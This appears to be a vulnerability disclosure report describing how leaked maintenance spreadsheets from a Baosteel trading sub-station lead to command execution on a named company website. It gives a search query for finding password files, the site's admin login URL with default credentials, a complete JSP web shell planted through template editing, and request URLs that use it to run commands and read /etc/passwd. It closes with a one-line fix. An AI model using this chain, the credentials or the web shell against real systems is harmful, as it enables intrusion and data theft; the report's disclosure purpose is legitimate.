Getshell caused by leakage of O & M documents of a sub-station of Baosteel Trading Company

Getshell caused by leakage of O & M documents of a sub-station of Baosteel Trading Company

The maintenance documents of the sub-stations of Baosteel Trading Company are leaked, including intranet information, background addresses of multiple sub-stations, and usernames and passwords.

Among them, www.nesteel.cn (Shenyang Baosteel northeast Trading Company) can be getshell

Google query string: Baosteel filetype: xlsx intext: Password

It contains the background username, password, and management information of multiple Intranet hosts.

Background: http://www.nesteel.cn/cms_wz/login.jsp

Username: admin

Password: admin

After entering the background, you can use the template editing function to add jsp code

Add code

<%@ page import="java.util.*,java.io.*"%><%if (request.getParameter("cmd") != null) {        out.println("Command: " + request.getParameter("cmd") + "<BR>");        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));        OutputStream os = p.getOutputStream();        InputStream in = p.getInputStream();        DataInputStream dis = new DataInputStream(in);        String disr = dis.readLine();        while ( disr != null ) {                out.println(disr);                disr = dis.readLine();                }        }%>

You can use the site preview function to execute commands (with the cmd parameter) and getshell.

Because the document exposes a large amount of intranet information, it is estimated that it can cause greater damage because there is no time for testing.

Site preview url

View-source: http://www.nesteel.cn/cms_wz/DispatchAction.do? EfFormEname = ECTM40 & key = Encrypt & passPermit = true & cmd = id
 

view-source:http://www.nesteel.cn/cms_wz/DispatchAction.do?efFormEname=ECTM40&key=AWIAPwFqUzICY1dgB2AMbQNnAmEGYgM0UGMFNQJmUGIBEgxDXUZVd1ZHAUZfSFc2&passPermit=true&cmd=cat /etc/passwd
 

 

Solution:

Stop file sharing and change the background password to a strong password.